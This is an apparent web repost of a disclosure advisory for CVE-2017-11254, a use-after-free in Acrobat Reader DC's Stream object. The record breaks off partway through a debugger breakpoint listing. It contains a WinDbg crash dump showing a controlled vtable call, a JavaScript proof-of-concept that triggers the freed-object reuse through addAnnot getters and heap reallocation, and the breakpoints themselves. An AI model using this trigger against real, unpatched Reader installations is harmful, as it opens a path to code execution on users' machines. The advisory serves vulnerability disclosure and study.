{"id":8663,"date":"2017-08-09T14:19:09","date_gmt":"2017-08-09T22:19:09","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/08\/09\/news-2436\/"},"modified":"2017-08-09T14:19:09","modified_gmt":"2017-08-09T22:19:09","slug":"news-2436","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/08\/09\/news-2436\/","title":{"rendered":"SSD Advisory \u2013 Acrobat Reader DC &#8211; Stream Object Remote Code Execution"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Wed, 09 Aug 2017 10:50:38 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3361\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3361');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes a use after free vulnerability that leads to remote code execution found in Acrobat Reader DC version 2017.009.20044.<\/p>\n<p><strong>Credit<\/strong><br \/> A security researcher from, Siberas, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vendor response<\/strong><br \/> The vendor has released patches to address this vulnerability.<br \/> For more information: <a href=\"http:\/\/www.adobe.com\/devnet-docs\/acrobatetk\/tools\/ReleaseNotes\/DC\/dccontinuousaug2017.html#dccontinuousaugusttwentyseventeen\" target=\"_blank\">http:\/\/www.adobe.com\/devnet-docs\/acrobatetk\/tools\/ReleaseNotes\/DC\/dccontinuousaug2017.html#dccontinuousaugusttwentyseventeen<\/a><\/p>\n<p>CVE: CVE-2017-11254<\/p>\n<p><span id=\"more-3361\"><\/span><\/p>\n<p><strong>Vulnerability details<\/strong><br \/> Adobe Reader DC, are affected by a Use After Free vulnerability. The vulnerability occurs due to a Stream object being dereferenced after it has been destroyed. The re-use of the freed object directly leads to a controllable vtable call. By controlling the vtable we can execute arbitrary code in the sandboxed <em>AcroRd32.exe<\/em> process.<\/p>\n<p>The vtable pointer is read from offset 0x18 of the freed object:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-598b8a5d143fd509732045\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> (2ae4.3b20): Access violation &#8211; code c0000005 (!!! second chance !!!)  eax=08981638 ebx=006fc6f8 ecx=deadc0c6 edx=00000016 esi=08a9aeb8 edi=08c7b628  eip=5f0ed95d esp=006fb6a8 ebp=006fb6ac iopl=0         nv up ei pl nz na po nc  cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202  AcroRd32_5f080000+0x6d95d:  5f0ed95d ff5118          call    dword ptr [ecx+18h]  ds:002b:deadc0de=????????    0:000&gt; dd eax-8  08d018e0  aaaaaaaa aaaaaaaa aaaaaaaa aaaaaaaa \/\/ we deref offset 0x18 of the Stream object  08d018f0  aaaaaaaa aaaaaaaa deadc0c6 eeeeeeee \/\/ at offset 0x18 we find 0xdeadc0c6   \t\t\t\t\t\t\t\/\/ 0xdeadc0c6 + 0x18 == 0xdeadc0de  08d01900  eeeeeeee eeeeeeee eeeeeeee eeeeeeee  08d01910  eeeeeeee eeeeeeee eeeeeeee eeeeeeee<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0026 seconds] -->  <\/p>\n<p>The Javascript code which triggers the vulnerable code path is:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-598b8a5d14406565260978\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> function somefunc(){}    function obj1_read()  {  \tlog(&#8220;[obj1_read], get read property&#8221;);  \tglobarr.push(allocs(0x200, 0x88, basestring)); \/\/ [3]  \treturn undefined;  }    function obj1_write()  {  \tlog(&#8220;[obj1_write], get write property&#8221;);  \treturn somefunc;  }    function obj2_read()  {  \tlog(&#8220;[obj2_read], get read property&#8221;);  \treturn undefined;  }    function obj2_write()  {  \tlog(&#8220;[obj2_write], get write property&#8221;);  \treturn somefunc;  }    obj1 = new Object(); \/\/ [1]  obj1.__defineGetter__(&#8220;read&#8221;, obj1_read);  obj1.__defineGetter__(&#8220;write&#8221;, obj1_write);  obj2 = new Object();  obj2.__defineGetter__(&#8220;read&#8221;, obj2_read);  obj2.__defineGetter__(&#8220;write&#8221;, obj2_write);    app.alert(&#8220;crash @ 0xdeadc0de&#8221;);  this.addAnnot( { &#8220;name&#8221; : obj1, &#8220;rect&#8221; : obj2, &#8220;type&#8221; : &#8220;Highlight&#8221;}); \/\/ [2]<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14406565260978-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14406565260978-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14406565260978-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14406565260978-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14406565260978-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14406565260978-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14406565260978-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14406565260978-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14406565260978-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14406565260978-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14406565260978-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14406565260978-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14406565260978-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14406565260978-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14406565260978-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14406565260978-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14406565260978-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14406565260978-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14406565260978-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14406565260978-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14406565260978-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14406565260978-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14406565260978-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14406565260978-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14406565260978-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14406565260978-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14406565260978-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14406565260978-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14406565260978-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14406565260978-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14406565260978-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14406565260978-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14406565260978-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14406565260978-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14406565260978-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14406565260978-36\">36<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14406565260978-1\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">somefunc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14406565260978-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14406565260978-3\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">obj1_read<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14406565260978-4\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14406565260978-5\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">log<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[obj1_read], get read property&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14406565260978-6\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">globarr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">push<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">allocs<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x200<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x88<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">basestring<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/ [3]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14406565260978-7\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">undefined<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14406565260978-8\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14406565260978-9\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14406565260978-10\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">obj1_write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14406565260978-11\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14406565260978-12\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">log<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[obj1_write], get write property&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14406565260978-13\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">somefunc<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14406565260978-14\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14406565260978-15\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14406565260978-16\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">obj2_read<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14406565260978-17\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14406565260978-18\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">log<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[obj2_read], get read property&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14406565260978-19\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">undefined<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14406565260978-20\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14406565260978-21\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14406565260978-22\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">obj2_write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14406565260978-23\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14406565260978-24\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">log<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[obj2_write], get write property&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14406565260978-25\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">somefunc<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14406565260978-26\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14406565260978-27\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14406565260978-28\"><span class=\"crayon-v\">obj1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Object<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/ [1]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14406565260978-29\"><span class=\"crayon-v\">obj1<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">__defineGetter__<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;read&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj1_read<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14406565260978-30\"><span class=\"crayon-v\">obj1<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">__defineGetter__<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;write&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj1_write<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14406565260978-31\"><span class=\"crayon-v\">obj2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Object<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14406565260978-32\"><span class=\"crayon-v\">obj2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">__defineGetter__<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;read&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj2_read<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14406565260978-33\"><span class=\"crayon-v\">obj2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">__defineGetter__<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;write&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj2_write<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14406565260978-34\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14406565260978-35\"><span class=\"crayon-v\">app<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;crash @ 0xdeadc0de&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14406565260978-36\"><span class=\"crayon-r\">this<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">addAnnot<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;name&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;rect&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj2<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;type&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Highlight&#8221;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/ [2]<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0027 seconds] -->  <\/p>\n<p>At [1] we create two objects with defined getter-methods for the \u201cread\u201d and \u201cwrite\u201d properties. These two objects are passed as parameters to the native function \u201c<em>this.addAnnot<\/em>\u201d at [2].<\/p>\n<p>During addAnnot the objects are checked for the \u201cread\u201d and \u201cwrite\u201d properties. If we return a valid function (in this case \u201csomefunc\u201d) for the \u201cwrite\u201d properties and \u201cundefined\u201d for the \u201cread\u201d properties, we trigger a Use-After-Free vulnerability. <\/p>\n<p>Acrobat Reader DC initializes a temporary Stream object because the \u201cwrite\u201d property returns a valid function and destroys it immediately afterwards since \u201cread\u201d returns undefined. Due to the fact that a reference to the destroyed Stream object stays intact, we can reference the Stream object again after it has been freed. <\/p>\n<p>There are further callbacks between the destruction and the re-use of the object which gives us the chance to re-allocate the freed buffer with controlled content (at [3]) and execute a controlled vtable call as soon as the Stream object is dereferenced again.<\/p>\n<p>In order to debug the vulnerability, we will set the following breakpoints in Reader:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-598b8a5d1440b955133564\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> bp EScript+0x137ca3 &#8220;.printf &#8220;log: %mu\\r\\n&#8221;, poi(poi(poi(esp+c)+10)+4); g&#8221;\t     \/\/ log breakpoint  bp AcroRd32.dll+0x111351 &#8220;.printf &#8220;created Stream object @ 0x%x\\r\\n&#8221;, eax; g&#8221;     \/\/ Stream object constructor  bp AcroRd32.dll+0x116ABE &#8220;.printf &#8220;destroy Stream object @ 0x%x\\r\\n&#8221;, esi; g&#8221;\t     \/\/ Stream object destructor<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d1440b955133564-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d1440b955133564-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d1440b955133564-3\">3<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-598b8a5d1440b955133564-1\"><span class=\"crayon-e\">bp <\/span><span class=\"crayon-v\">EScript<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x137ca3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;.printf &#8220;log: %mu\\r\\n&#8221;, poi(poi(poi(esp+c)+10)+4); g&#8221;<\/span><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/\/ log breakpoint<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d1440b955133564-2\"><span class=\"crayon-e\">bp <\/span><span class=\"crayon-v\">AcroRd32<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">dll<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x111351<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;.printf &#8220;created Stream object @ 0x%x\\r\\n&#8221;, eax; g&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/\/ Stream object constructor<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d1440b955133564-3\"><span class=\"crayon-e\">bp <\/span><span class=\"crayon-v\">AcroRd32<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">dll<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x116ABE<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;.printf &#8220;destroy Stream object @ 0x%x\\r\\n&#8221;, esi; g&#8221;<\/span><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/\/ Stream object 